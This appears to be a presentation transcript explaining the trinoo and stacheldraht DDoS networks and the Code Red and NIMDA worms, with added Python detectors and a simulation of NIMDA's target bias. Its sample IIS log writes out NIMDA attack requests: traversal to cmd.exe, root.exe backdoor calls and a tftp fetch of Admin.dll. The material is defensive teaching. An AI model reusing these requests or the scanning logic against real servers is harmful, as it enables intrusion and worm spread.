A Distributed DoS in Action

Presentation on theme: "A Distributed DoS in Action"— Presentation transcript:

1 A Distributed DoS in Action
[Slide diagram: Client Hacker, Master Control Programs, Broadcast Host Agents and the Internet, with the phases "Registration Phase" and "Verify Registration" and the messages *HELLO*, png and PONG.]

When the Master Control Programs are loaded and run, they listen on TCP port 27665 for messages from the Client Hacker and on UDP port 31335 for messages from the hundreds of Broadcast Agents. Any message from the Client Hacker must also carry a password before the Master Control Program will accept it.

When the Broadcast Agents are loaded, they contain a small encrypted list of the IP addresses of all the Master Control Programs. When a Broadcast Agent is first run, it sends a short UDP packet containing the word "*HELLO*" to each of those addresses (port 31335, of course), which in effect registers it with the Master Control Program as ready. The Master Control Programs record the source IP address of each such packet (the location of the Broadcast Agent). The Broadcast Agents then listen on UDP port 27444 for future commands from the Master.

Before initiating the attack, the Client Hacker can optionally send a command to the Master Control Programs to verify that the Broadcast Agents are still ready (that is, that they have not been discovered or their hosts taken offline). Each Master Control Program sends a UDP packet containing the word "png" to all of its hundreds of registered Broadcast Agent IP addresses (port 27444). Agents that are still active respond with the word "PONG" (to UDP port 31335 on the Master, the same port used for registration).

2 The Attack Phase
[Slide diagram: Client Hacker, Master Control Programs, Broadcast Host Agents, Attack Targets and the Internet, with the UDP floods labelled "UDP Flood Attack" and "COLLATERAL DAMAGE".]

When the Hacker is ready to begin the attack, he sends the command, along with the password and the list of target IP addresses, to the Master Control Programs (TCP port 27665). The Master Control Programs then send the command and IP address list to the hundreds of Broadcast Agents they have registered all over the Internet (UDP port 27444). The hundreds of Broadcast Agents then begin their attack, flooding random ports of the target host(s) with simple UDP packets. In the case of stacheldraht, the flood packets additionally carry a spoofed source IP address, so the attack appears to come from a completely different source and yet another party is drawn in: the host whose address was spoofed receives the targets' ICMP port-unreachable replies and is liable to be blamed for the flood (the collateral damage in the diagram).

Trinoo's Master accepts six different commands from the Client Hacker:
- set a timer to begin the attack at a future time
- begin a DoS attack against one IP target
- begin a DoS attack against multiple IP targets
- kill all registered Broadcast Agents
- verify that registered Agents are still ready (the "png"/"PONG" exchange)
- set the size of the UDP packets used in the flood attack
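The registration, verification and command traffic described in slides 1 and 2 is simple enough to pick out on the wire, which is how the early trinoo detection signatures worked. The following is an added example, not code from the slides or from trinoo itself: it classifies constructed packet records by the three trinoo ports and the literal "*HELLO*", "png" and "PONG" payloads the slides cite, then rebuilds which agents registered with a master and which ones went quiet. The Packet record layout, the sample addresses and the "attack ..." command payload are assumptions made for this example (the real trinoo command syntax is not reproduced).

```python
from collections import defaultdict
from typing import NamedTuple, Optional

# trinoo's control ports as cited in the slides
MASTER_TCP_PORT = 27665   # Client Hacker -> Master (password-protected command channel)
MASTER_UDP_PORT = 31335   # Agents -> Master ("*HELLO*" registration, "PONG" replies)
AGENT_UDP_PORT = 27444    # Master -> Agents ("png" liveness checks, attack commands)


class Packet(NamedTuple):
    """Assumed minimal flow record for this example."""
    src: str
    dst: str
    proto: str      # "tcp" or "udp"
    dport: int
    payload: bytes


def classify(pkt: Packet) -> Optional[str]:
    """Name the trinoo control event a packet represents, or None if it looks unrelated."""
    body = pkt.payload.strip()
    if pkt.proto == "udp" and pkt.dport == MASTER_UDP_PORT:
        if body == b"*HELLO*":
            return "agent_registration"
        if body == b"PONG":
            return "agent_pong"
        return "agent_to_master_other"
    if pkt.proto == "udp" and pkt.dport == AGENT_UDP_PORT:
        if body == b"png":
            return "master_ping"
        return "master_command"
    if pkt.proto == "tcp" and pkt.dport == MASTER_TCP_PORT:
        return "client_to_master"
    return None


def build_botnet_view(packets) -> dict:
    """Per master: agents that registered, agents that answered a png, commands pushed."""
    view = defaultdict(lambda: {"agents": set(), "alive": set(), "commands": 0})
    for pkt in packets:
        event = classify(pkt)
        if event == "agent_registration":
            view[pkt.dst]["agents"].add(pkt.src)
        elif event == "agent_pong":
            view[pkt.dst]["alive"].add(pkt.src)
        elif event == "master_command":
            view[pkt.src]["commands"] += 1
    return dict(view)


def silent_agents(view: dict, master: str) -> set:
    """Agents that registered but never answered the master's png (cleaned up or offline)."""
    entry = view.get(master)
    if entry is None:
        return set()
    return entry["agents"] - entry["alive"]


# Constructed sample traffic: two agents register, only one answers the ping,
# the client talks to the master over TCP, the master pushes one command,
# and one unrelated DNS packet is mixed in.
SAMPLE = [
    Packet("10.0.0.5", "192.0.2.10", "udp", 31335, b"*HELLO*"),
    Packet("10.0.0.6", "192.0.2.10", "udp", 31335, b"*HELLO*"),
    Packet("192.0.2.10", "10.0.0.5", "udp", 27444, b"png"),
    Packet("192.0.2.10", "10.0.0.6", "udp", 27444, b"png"),
    Packet("10.0.0.5", "192.0.2.10", "udp", 31335, b"PONG"),
    Packet("198.51.100.7", "192.0.2.10", "tcp", 27665, b"..."),
    Packet("192.0.2.10", "10.0.0.5", "udp", 27444, b"attack 203.0.113.9"),  # placeholder command text
    Packet("10.0.0.9", "10.0.0.1", "udp", 53, b"\x00"),
]

if __name__ == "__main__":
    view = build_botnet_view(SAMPLE)
    for master, entry in view.items():
        print(master, "agents:", sorted(entry["agents"]), "alive:", sorted(entry["alive"]),
              "commands:", entry["commands"], "silent:", sorted(silent_agents(view, master)))
```

Port-and-keyword matching like this is only as good as the defaults: a master recompiled to use other ports or strings slips past it, which is why the registration burst (many hosts sending the same short UDP packet to one address) is the more durable indicator.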

3 How CODE RED Works
First infected system
Code Red exploits a remote buffer overflow in the Indexing Service ISAPI extension (idq.dll) of Microsoft IIS, a vulnerability present in the IIS versions of the time (4.0 and 5.0). The first infected system attempts to connect to other systems via port 80 (web).

4 Scans to find new victims
How CODE RED Works: the first infected system scans to find new victims, running 100 probes of other systems at a time.

5 Scans to find new victims
How CODE RED Works: the first infected system keeps scanning to find new victims.

6 Each new victim starts the scanning process over again
- Each new victim starts the scanning process over again.
- From the 20th of the month to the end of the month (EOM), each infected system attempts to launch a DoS against its primary target ( ) by sending it large junk packets.

7 How NIMDA Works
First infected system
NIMDA attempts to infect using the following methods:
- the IIS Extended Unicode Directory Traversal Vulnerability
- the IIS Escaped Character Decoding Command Execution Vulnerability
- backdoors left behind by earlier Code Red II and Sadmind infections
The first infected system attempts to connect to other systems via port 80 (web).

8 tftp Admin.dll from attacking system (contains NIMDA payload)
How NIMDA Works: once the victim has been exploited, it uses the Trivial File Transfer Protocol (tftp, a simpler cousin of ftp) to retrieve "Admin.dll" from the attacking system. Admin.dll contains the NIMDA code.
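All three infection methods from slide 7, and the tftp fetch of Admin.dll from slide 8, show up in the web server's request log, so an IIS log is the natural place to look for a NIMDA-infected neighbour. The following is an added example, not code from the slides or from the worm: it decodes request paths the way the two vulnerable IIS parsers effectively did (overlong UTF-8 such as %c0%af folded to '/', then a second %XX pass so %255c becomes '\'), and flags traversal to cmd.exe, the root.exe backdoor that Code Red II and the Sadmind/IIS worm left behind, and a tftp command that pulls Admin.dll. The log format, the client addresses and the status codes are constructed for this example; the request shapes are the ones NIMDA was known to send.

```python
from urllib.parse import unquote, unquote_to_bytes

# Constructed IIS-style log lines for this example: "client-ip method uri-stem uri-query status".
SAMPLE_LOG = """\
10.1.1.20 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
10.1.1.20 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
10.1.1.20 GET /scripts/root.exe /c+dir 200
10.1.1.20 GET /MSADC/root.exe /c+dir 404
10.1.1.20 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp%20-i%2010.1.1.20%20GET%20Admin.dll 200
10.1.1.30 GET /index.html - 200
10.1.1.31 GET /products/list.asp id=42 200
"""


def normalize(uri: str) -> str:
    """Decode a request the way the vulnerable IIS code paths effectively did:
    one %XX pass, overlong two-byte UTF-8 forms (lead byte 0xC0/0xC1) folded to the
    ASCII character they encode (%c0%af -> '/', %c1%9c -> '\\'), then a second %XX
    pass (so %255c -> %5c -> '\\'); finally '\\' is mapped to '/' and the result lower-cased."""
    raw = unquote_to_bytes(uri)
    chars = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            chars.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            chars.append(chr(b))
            i += 1
    return unquote("".join(chars)).replace("\\", "/").lower()


def classify_request(stem: str, query: str) -> list:
    """Return the NIMDA-style indicators found in one request (empty list if none)."""
    path = normalize(stem)
    q = normalize(query)
    reasons = []
    if "/../" in path and path.endswith("/cmd.exe"):
        reasons.append("traversal_to_cmd")       # Unicode or double-decode traversal
    if path.endswith("/root.exe"):
        reasons.append("root_exe_backdoor")      # Code Red II / Sadmind leftovers
    if "tftp" in q and "admin.dll" in q:
        reasons.append("tftp_admin_dll_fetch")   # pulling the NIMDA payload (slide 8)
    return reasons


def scan_log(text: str) -> list:
    """Parse the constructed log format; return (client_ip, uri_stem, reasons) per hit."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ip, _method, stem, query, _status = parts
        reasons = classify_request(stem, "" if query == "-" else query)
        if reasons:
            hits.append((ip, stem, reasons))
    return hits


def infected_clients(text: str) -> set:
    """Source addresses that sent at least one NIMDA-style probe."""
    return {ip for ip, _, _ in scan_log(text)}


if __name__ == "__main__":
    for ip, stem, reasons in scan_log(SAMPLE_LOG):
        print(ip, stem, reasons)
    print("probable infected hosts:", sorted(infected_clients(SAMPLE_LOG)))
```

Note that the status code is deliberately ignored: a 404 on the %c0%af form only means that particular server was patched against one of the two bugs, and the same client is very likely to try the other forms next, so the probe itself is the signal.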

9 Vulnerable IIS web servers
How NIMDA Works: once infected with NIMDA, the victim system will:
- scan the network for vulnerable IIS web servers
- harvest addresses from the Windows address book and send them an infected "readme.exe" attachment
- attach a copy of NIMDA, named "README.EML", to all web-related files (.html, .htm, etc.), so that NIMDA is served along with the web pages of the infected server
- attempt to copy NIMDA to all open file shares

10 How NIMDA Works - NIMDA prefers to target its neighbors
NIMDA targets systems in its own IP space; it attacks a completely random target IP only 25% of the time:
- with 50% probability it chooses a target sharing its own first two octets
- with 25% probability it chooses a target sharing only its own first octet
- with 25% probability it chooses a completely random target
Because NIMDA prefers to target its neighbors, propagation inside a network that already holds one infected host is very rapid.
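The 50/25/25 split above is easy to state but its effect on a scan is easier to see by simulating it. The following is an added example, not code from the slides or from the worm: choose_target draws one target with the slide's bias (octets below the chosen prefix are filled in at random), and scan_mix measures how much of a long scan lands in the infected host's own /16 and /8. The FixedRng helper is test scaffolding so a particular branch can be forced; the 10.20.30.40 address is made up for the example.

```python
import random


class FixedRng:
    """Stand-in for random.Random that forces one branch (example scaffolding only)."""
    def __init__(self, r: float, octet: int = 7):
        self.r, self.octet = r, octet

    def random(self) -> float:
        return self.r

    def randrange(self, n: int) -> int:
        return self.octet % n


def choose_target(own_ip: str, rng=random) -> str:
    """Pick one scan target with the bias the slide describes:
    50% same first two octets, 25% same first octet only, 25% fully random."""
    a, b, _, _ = (int(x) for x in own_ip.split("."))
    r = rng.random()
    if r < 0.50:
        return f"{a}.{b}.{rng.randrange(256)}.{rng.randrange(256)}"
    if r < 0.75:
        return f"{a}.{rng.randrange(256)}.{rng.randrange(256)}.{rng.randrange(256)}"
    return ".".join(str(rng.randrange(256)) for _ in range(4))


def scan_mix(own_ip: str, n: int, seed: int = 1) -> dict:
    """Simulate n target choices and report the fraction inside the host's own /16,
    inside its /8 (which includes the /16 hits), and everywhere else."""
    rng = random.Random(seed)
    a, b, _, _ = own_ip.split(".")
    same16 = same8 = 0
    for _ in range(n):
        t = choose_target(own_ip, rng).split(".")
        if t[0] == a:
            same8 += 1
            if t[1] == b:
                same16 += 1
    return {"same_16": same16 / n, "same_8": same8 / n, "elsewhere": 1 - same8 / n}


if __name__ == "__main__":
    print(choose_target("10.20.30.40", FixedRng(0.10)))   # forced: same first two octets
    print(choose_target("10.20.30.40", FixedRng(0.60)))   # forced: same first octet
    print(choose_target("10.20.30.40", FixedRng(0.90)))   # forced: fully random
    print(scan_mix("10.20.30.40", 20000))
```

Roughly three quarters of every infected host's probes therefore stay inside its own /8 and half inside its /16, which is why one NIMDA infection behind a firewall could saturate an internal network within minutes while the outside world saw comparatively little of that host's traffic.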
